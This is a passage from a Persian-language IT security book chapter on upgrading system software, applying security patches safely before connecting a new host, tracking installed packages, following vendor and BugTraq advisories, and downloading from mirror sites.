‫ﻣﺜﻞ ‪ sourceforge.net‬ﻛﻪ ﻣﺨﺎﺯﻥ ‪ CVS‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺮﺟـﻊ ﺧـﻮﺏ ‪ CVS‬ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﻛﺘـﺎﺏ‬
‫"ﺿﺮﻭﺭﻳﺎﺕ ‪ (Essential CVS) "CVS‬ﺍﺷﺎﺭﻩ ﮐﺮﺩ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ‬
‫ﻲ ﺁﺷﻜﺎﺭ‬
‫ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﺷﻮﺩ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻤﺎﻡ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻓﺮﺍﮔﻴـﺮﻱ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺯﻩ ﻛﺸﻒﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﮔﻮﺵ ﺑﻪ ﺯﻧﮓ ﺑﺎﺷﻴﺪ ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺻﻼﺡﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ ﺁﻧﻬﺎ‬
‫ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺎﺯﻩ ﻧﺼﺐ ﺷﺪﻩ ‪ download‬ﻛﺮﺩﻥ ﺍﺻﻼﺡﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮ ﻭ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﺧﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺍﻳﻤﻨﻲ ﺑﻪﺭﻭﺯ ﺷﺪﻩ )ﻣﺜ ﹰﻼ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ Mac‬ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻛﻪ ﻫﻴﭻ ﺧﺪﻣﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻧﻤـﻲﻛﻨـﺪ(‪.‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﻣﻮﺭﺩ ﺑﺤﺚ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻳﻜﺒﺎﺭ ‪ download‬ﺷﺪﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﻣﻨﺘﻘﻞ ﻛﺮﺩ ﻳﺎ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻳﻚ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺮﺩ ﻭ ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﻣﻨﺎﺳـﺐ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﭼﻨـﺪﻳﻦ ﺭﺍﻳﺎﻧـﻪ ﺩﺍﺭﻳـﺪ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﺷﺪﻥ ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎ ‪ download‬ﻛﺮﺩﻥ ﭼﻨﺪﺑﺎﺭﺓ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎ ﺍﺗـﺼﺎﻝ ﺷـﺒﻜﻪ ﺭﺍ ﻛﻨـﺪ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺭﻭﻱ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨـﺪ‪ .‬ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ WindowsUpdate Catalog‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻗﺎﺑﻞ ‪ download‬ﺭﺍ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﻫﻴﭻ ﻣﻴﺰﺑﺎﻥ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻳﺎ ﻣﻨﺎﺳﺐ ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺖ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺷﻮﺩ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜـﻪ ﺍﺻـﻼﺣﺎﺕ‬
‫ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﻤﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﺗـﺎ ﺣـﺪ‬
‫ﺍﻣﻜﺎﻥ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺭﺍ ﻛﻮﺗﺎﻩ ﻧﻤﺎﻳﻴﺪ ‪ -‬ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻪ ﺍﺻﻼﺡﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ‪ download‬ﺷﻮﻧﺪ ‪ -‬ﻭ ﺳﭙﺲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺻـﻼﺡﻫـﺎ‬
‫ﺩﺭﺣﺎﻝ ﻧﺼﺐ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺒﻜﻪ ﺟﺪﺍ ﺳﺎﺯﻳﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺗﺼﺎﻝ ﺩﺳـﺘﮕﺎﻩ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ‪ Stateful‬ﻳﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺗﺮﺟﻤﺔ ﻣﻲﻛﻨﺪ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻤﻦﺗﺮ ﻫﻢ ﺑﺸﻮﺩ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛـﻪ ﺗﻨﻬـﺎ‬
‫ﺑﺴﺘﻪﻫﺎﻳﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺑﺮﺳﻨﺪ ﮐﻪ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺗﺼﺎﻟﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺷﺮﻭﻉ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﻧﻤﻲﺩﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩﺍﻳﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻳﻚ ﺟـﺰﺀ ﻣﻬـﻢ ﻓﺮﺁﻳﻨـﺪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ‪ ،‬ﻛـﺸﻒ ﻭ‬
‫ﻻ ﺍﺯ‬
‫ﺭﺩﻳﺎﺑﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪﻱ ﺍﺳﺖ ﻛﻪ ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﭼﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺳﺎﺱ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ‬
‫ﻻ ﺑﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻫﻤﺔ ﻣﺘﻨﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺼﺐ ﺷﺪﻩ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻭﺍﺣﺪ ‪ -‬ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‬
‫ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ‬
‫‪ -‬ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ‪.‬‬
‫‪111 Versioning Systems‬‬
‫‪112 Concurrent Versioning System‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٠٣‬‬
‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﺻﻼﺡﻫﺎ‬
‫ﭼﻨﺪ ﻣﻄﻠﺐ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺻﻼﺡﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﺍﻧﻮﺍﻉ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﻭ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺻﻠﻲ ﻣﺜﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺍﻋـﻼﻡ ﺍﻧﺘـﺸﺎﺭ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺩﺍﺭﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺑﻮﻟﺘﻨﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻛـﺰ‬
‫ﭘﺮﻭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ )‪ .(http://register.microsoft.com/regsys/pic.asp‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ‬
‫ﺍﻋﻼﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﻣﺠﺰﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﻣﺎﻧﻨـﺪ ‪ BugTraq‬ﻭ ‪ NT-BugTraq‬ﺍﺧﻄﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ‬
‫ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺣﺎﻟﺖ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺧﻼﺻﻪ( ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ﻣـﺮﺗﺒﻂ‬
‫ﺑﺎ ‪ Usenet‬ﭘﺴﺖ ﻣﻲﻛﻨﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺑﻨﺎﻡ ‪ BIND‬ﺩﺭ ‪ comp.protocols.dns.bind‬ﻣﻲﺁﻳﺪ(‪ .‬ﺑﻄﻮﺭ ﻣـﻨﻈﻢ‬
‫ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ﺳﺮ ﺑﺰﻧﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﺓ ﺷﻤﺎ ﺩﻳﺴﮏ ﻓﺸﺮﺩﺓ ﺣﺎﻭﻱ ﺍﺻﻼﺡﻫﺎ ﺭﺍ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳـﻦ ﺩﻳـﺴﮑﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺍﺻﻼﺡﻫﺎﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﺎ ﻫﻤﺎﻥ ﻟﺤﻈﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻜﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ ﭼﻮﻥ ﺗﻌﺪﺍﺩ ﺍﺻﻼﺡﻫـﺎﻳﻲ‬
‫ﻛﻪ ﺑﺎﻳﺪ ‪ download‬ﺷﻮﻧﺪ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺯﻳﺎﺩﻱ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺧﻮﺩﻛﺎﺭ‪ ،‬ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺭﺍ ﺑـﺎ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ ﺭﻭﻱ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﻓﺮﻭﺷﻨﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﺑﺴﺘﻪﺑﻨﺪﻱ ﺑـﻪﺭﻭﺯ ﻧﻴـﺴﺖ‪ .‬ﺑﻴـﺸﺘﺮ ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﮕﻮﻧـﻪﺍﻱ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺭﺗﻘﺎ ﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ‪ download‬ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺑـﺮﺍﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻗﺒﻠﻲ‬
‫ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺍﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﺭﺳـﻲ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫‪ Download‬ﻭ ﺑﺮﺭﺳﻲ ﺍﺻﻼﺡﻫﺎ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻫﺮﻳﻚ ﺍﺯ ﺍﺻﻼﺣﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﻣﺠﺒﻮﺭ‬
‫ﻻ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﻳـﺎ‬
‫ﻫﺴﺘﻴﺪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﺩ‪ ،‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﭘﺎﺳﺨﮕﻮﻱ ﺧﻴﻞ ﺗﻘﺎﺿﺎﻫﺎ ﺑﺮﺍﻱ ‪ download‬ﺁﻥ ﺑﺎﺷـﺪ‪ ،‬ﻟـﺬﺍ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺎﻳﺘﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ‪ ١١٣‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﻣﺸﺎﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻻ ﻫـﺮ‬
‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺸﻮﻳﻖ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ )ﺩﺭ ﺟﻐﺮﺍﻓﻴﺎﻱ ﺷﺒﻜﻪ( ‪ download‬ﻛﻨﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺍﺯ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺷﻨﺪﻩ )ﻣﻌﻤﻮ ﹰﻻ ﺑﻄﻮﺭ ﺭﻭﺯﺍﻧﻪ( ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪113 Mirror Sites‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
